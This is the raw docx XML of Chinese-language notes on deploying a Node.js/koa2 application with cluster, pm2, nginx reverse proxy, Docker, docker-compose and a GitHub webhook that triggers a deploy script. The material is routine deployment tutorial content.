        <w:t>Math.random() &gt; 0.9 ?  aaa() : '2'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await next();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ctx.response.type = 'text/html';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ctx.response.body = '&lt;h1&gt;Hello, koa2!&lt;/h1&gt;';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(!module.parent) {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app.listen(3000);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console.log('app started at port 3000...');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 else {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module.exports = app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//Cluster.js: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cluster = require('cluster');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os = require('os'); // 获取CPU 的数量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numCPUs = os.cpus().length;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process = require('process')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console.log('numCPUs:', numCPUs)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workers = {};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(cluster.isMaster) {// 主进程分支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当一个工作进程结束时，重启工作进程 delete workers[worker.pid];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cluster.on('death', function (worker) {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worker = cluster.fork();//重新开启一个线程，其实也是重新执行cluster.js 但是会走else分支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workers[worker.pid] = worker;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});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初始开启与CPU 数量相同的工作进程 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(var i = 0; i &lt; numCPUs; i++) {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var worker = cluster.fork();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workers[worker.pid] = worker;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 else {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工作进程分支，启动服务器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var app = require('./app');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app.use(async (ctx, next) =&gt; {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console.log('worker' + cluster.worker.id + ',PID:' + process.pid)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next()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})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app.listen(3000);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当主进程被终止时，关闭所有工作进程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process.on('SIGTERM', function () {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(var pid in workers) {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process.kill(pid);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process.exit(0);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});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启动：node cluster.js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8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scp上传文件：上传到根目录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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Scp test.js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"mailto:root@47.98.252.43:/root/"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root@47.98.252.43:/root/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（把多次命令编写成一个shell脚本）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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通过Git命令拉取</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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可视化工具filezilla 客户端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9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pm2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安装：npm install -g pm2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Pm2 start app.js --watch -i 2 //-watch 监听文件变化，-i 启动多少个实例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停止：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Pm2 stop all/pm2 stop [name]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Pm2 list  //查看运行的实例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配置文件方式：新建文件process.yml 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apps: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- script : app.js  //启动脚本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"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instances: 2 //监听的实例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"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watch  : true //监听文件变化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env    :   //evn传参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NODE_ENV: production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执行方式：pm2 start process.yml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9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 有两个主要功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:left="105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静态服务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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指向前端打包的dist目录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:left="105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反向代理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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前端的接口请求/api/*** 会请求到nginx的80端口，nginx通过反向代理开头把api的开头的接口指向到对应的node服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105" w:leftChars="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="3359785"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1206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5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="105" w:leftChars="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:left="105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配置ngiux </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105" w:leftChars="0"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进入目录：/etc/nginx/sites-enabled  //sites-enabled是放置网站的根目录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105" w:leftChars="0" w:firstLine="210" w:firstLineChars="100"/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Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="AA5500"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="AA5500"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"># /etc/nginx/sites-enable/taro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AA5500"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19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AA5500"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="AA5500"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">taro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="AA5500"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> 输入下面的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="AA5500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 xml:space="preserve">server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 xml:space="preserve">listen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="116644"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r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 xml:space="preserve">server_name taro.josephxia.com; </w:t>
      </w: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//这个域名下面才会走下面的规则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 xml:space="preserve">location / {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 xml:space="preserve">root /root/source/taro-node/dist; </w:t>
      </w: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//网站根目录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 xml:space="preserve">index index.html index.htm; </w:t>
      </w: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 xml:space="preserve"> //启动页面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location ~ \.(gif|jpg|png)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r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 xml:space="preserve">{ </w:t>
      </w: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//图片的单独配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="192" w:firstLineChars="10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 xml:space="preserve">root /root/source/taro-node/server/static;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 xml:space="preserve">location /api { </w:t>
      </w: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//代理接口，代理到3000接口下面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 xml:space="preserve">proxy_pass http://127.0.0.1:3000;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 xml:space="preserve">proxy_redirect off;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 xml:space="preserve">proxy_set_header Host </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>$host</w:t>
      </w:r>
      <w:r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 xml:space="preserve">proxy_set_header X-Real-IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>$remote_addr</w:t>
      </w:r>
      <w:r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 xml:space="preserve">proxy_set_header X-Forwarded-For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0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>$proxy_add_x_forwarded_for</w:t>
      </w:r>
      <w:r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ind w:left="105" w:leftChars="0" w:firstLine="0" w:firstLine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Docker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105" w:left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操作系统层面的桌面虚拟化技术，隔离系统差异，提供一直的运行环境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105" w:left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="105" w:left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例子：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105"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Docker run -p 80:80 -v $PWD/WWW:/usr/share/nginx/html nginx -d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384" w:hanging="384" w:hangingChars="200"/>
        <w:jc w:val="left"/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 xml:space="preserve">  运行docker 镜像，内部端口80映射外部端口80，当前目录www映射</w:t>
      </w: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/usr/share/nginx/html -d代表在后台运行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105"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="105" w:left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Docker ps -a // 查看运行的容器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105" w:left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Docker stop id //停止容器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105" w:left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ind w:left="105" w:left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docker的三个核心概念：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 xml:space="preserve">  仓库，镜像，容器，在</w:t>
      </w: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仓库</w:t>
      </w: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中存放镜像，如果在运行中没有安装镜像的话，就从</w:t>
      </w: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仓库</w:t>
      </w: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里面拉取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 xml:space="preserve"> 镜像在运行中的实例我们就叫做容器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ind w:left="105" w:leftChars="0" w:firstLine="0" w:firstLine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建立自己的nginx镜像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105" w:left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新建文件</w:t>
      </w:r>
      <w:r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Dockerfile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105"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#Dockerfile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105"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FROM nginx:latest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105"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RUN echo '&lt;h1&gt;Hello, Kaikeba!&lt;/h1&gt;' &gt; /usr/share/nginx/html/index.html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105"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="105" w:left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在当前</w:t>
      </w:r>
      <w:r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Dockerfile</w:t>
      </w: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目录下面运行：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105" w:left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Docker buid -t mynginx .  //会读取dockerfile建立自己的镜像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105"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Docker run -p 80:80 -d mynginx //运行镜像 访问localhost就可以访问页面了</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105" w:leftChars="0" w:firstLine="210" w:firstLineChars="10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="105" w:leftChars="0" w:firstLine="210" w:firstLineChars="10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1"/>
        </w:numPr>
        <w:ind w:left="105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建立自己的node镜像</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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新建文件dockerfile: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#Dockerfile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#制定node镜像的版本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node:10-alpine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#移动当前目录下面的文件到app目录下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 .  /app/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#进入到容器app目录下面，类似cd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WORKDIR /app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#安装依赖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 npm install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#对外暴露的端口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EXPOSE 3000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#程序启动脚本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 ["node", "app.js"]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05" w:left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在当前</w:t>
      </w:r>
      <w:r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Dockerfile</w:t>
      </w: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目录下面运行：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build -t mynode .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Docker run -p 3000:3000-d mynode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</w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="105" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/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建立自己的pm2镜像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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>新建文件dockerfile:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105" w:leftChars="0"/>
        <w:jc w:val="both"/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 xml:space="preserve"> # Dockerfile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105" w:leftChars="0"/>
        <w:jc w:val="both"/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FROM keymetrics/pm2:latest-alpine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105" w:leftChars="0"/>
        <w:jc w:val="both"/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WORKDIR /usr/src/app</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105" w:leftChars="0"/>
        <w:jc w:val="both"/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ADD . /usr/src/app</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105" w:leftChars="0"/>
        <w:jc w:val="both"/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 xml:space="preserve">RUN npm config set registry https://registry.npm.taobao.org/ &amp;&amp; \    </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105" w:leftChars="0"/>
        <w:jc w:val="both"/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 xml:space="preserve">    npm i</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105" w:leftChars="0"/>
        <w:jc w:val="both"/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EXPOSE 3000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105" w:leftChars="0"/>
        <w:jc w:val="both"/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#pm2在docker中使用命令为pm2-docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105" w:leftChars="0"/>
        <w:jc w:val="both"/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CMD ["pm2-runtime", "start", "process.yml"]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新建文件夹process.yml：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apps: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 script : app.js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instances: 2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watch  : true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env    :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NODE_ENV: production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05" w:left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在当前</w:t>
      </w:r>
      <w:r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Dockerfile</w:t>
      </w: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目录下面运行：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Docker buidl -t mypm2 .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Docker run -p 3000:3000 -d mypm2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31"/>
        </w:numPr>
        <w:ind w:left="105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建立统一的docker-compose.yml文件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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version: '3.1'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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services:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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app-pm2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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container_name: app-pm2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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#构建容器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 寻找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>./backend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件夹下面的dockerfile 只吃了个</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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build: ./backend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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# 需要链接本地代码时</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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# volumes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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#   - ./backend:/usr/src/app</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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ports:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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- "3000:3000"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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mongo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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image: mongo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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restart: always</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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ports:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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- 27017:27017</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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nginx:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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restart: always</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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image: nginx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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ports:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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- 8091:80</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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# </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 本地代码映射到docker容器内部</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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volumes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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- ./nginx/conf.d/:/etc/nginx/conf.d</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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- ./frontend/dist/:/var/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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- ./static/:/static/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105"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31"/>
        </w:numPr>
        <w:ind w:left="105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git提交代码就执行发布：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105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在git网站上配置webhook，git push触发提交，触发配置的接口，接口在执行对应的shell脚本：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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echo Deploy Project</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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docker-compose up -d --force-recreate --build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105"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获取最新版代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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pull</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105"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强制重新编译容器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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docker-compose down</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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docker-compose up -d --force-recreate --build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105"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="105"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="105"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="105"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="105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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Webhook.js: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http = require('http')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createHandler = require('github-webhook-handler')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handler = createHandler({ path: '/webhooks', secret: 'myHashSecret' })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上面的 secret 保持和 GitHub 后台设置的一致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function run_cmd(cmd, args, callback) {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var spawn = require('child_process').spawn;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var child = spawn(cmd, args);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var resp = "";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child.stdout.on('data', function (buffer) { resp += buffer.toString(); });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child.stdout.on('end', function () { callback(resp) });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http.createServer(function (req, res) {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handler(req, res, function (err) {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res.statusCode = 404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res.end('no such location')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})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}).listen(7777,() =&gt;{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console.log('WebHooks Listern at 7777');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})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handler.on('error', function (err) {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console.error('Error:', err.message)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})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//git会触发这个接口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handler.on('push', function (event) {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console.log('Received a push event for %s to %s',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event.payload.repository.name,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event.payload.ref);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分支判断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if(event.payload.ref === 'refs/heads/master'){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console.log('deploy master..')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//执行这个shell命令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run_cmd('sh', ['./deploy-dev.sh'], function(text){ console.log(text) });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})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d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UnicodeM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SC-Semi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Sans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3CDB47"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="813CDB4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8B1E500C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8B1E500C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92183D88"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="92183D8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A243C8BA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A243C8BA"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="404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A258799A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A258799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A6968A19"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A6968A1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AEACFD8D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AEACFD8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B5511F7C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B5511F7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B93D750E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B93D750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BCA2B7F8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BCA2B7F8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0">
    <w:nsid w:val="BCC57B4F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BCC57B4F"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11">
    <w:nsid w:val="C4AFF16C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C4AFF16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">
    <w:nsid w:val="C74BAA5F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C74BAA5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">
    <w:nsid w:val="C98AB586"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C98AB58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4">
    <w:nsid w:val="CC93B471"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CC93B47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5">
    <w:nsid w:val="D4C91330"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D4C9133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6">
    <w:nsid w:val="D6A27C04"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D6A27C0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7">
    <w:nsid w:val="D7AC5AD8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D7AC5AD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8">
    <w:nsid w:val="DBEDB694"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DBEDB69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9">
    <w:nsid w:val="DFBC17AE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DFBC17A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0">
    <w:nsid w:val="F26E1112"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F26E1112"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="9"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21">
    <w:nsid w:val="FF1A50D4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FF1A50D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2">
    <w:nsid w:val="03A30700"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="03A3070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3">
    <w:nsid w:val="04AB93F2"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="04AB93F2"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="24">
    <w:nsid w:val="07078D16"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="07078D1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5">
    <w:nsid w:val="2C95D2FF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2C95D2FF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210" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="26">
    <w:nsid w:val="35622812"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="35622812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105" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="27">
    <w:nsid w:val="3BE92566"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="3BE92566"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="（%1）"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="28">
    <w:nsid w:val="478B125E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="478B125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9">
    <w:nsid w:val="559469EE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="559469E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0">
    <w:nsid w:val="72DF83E1"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="72DF83E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9"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="1"/>
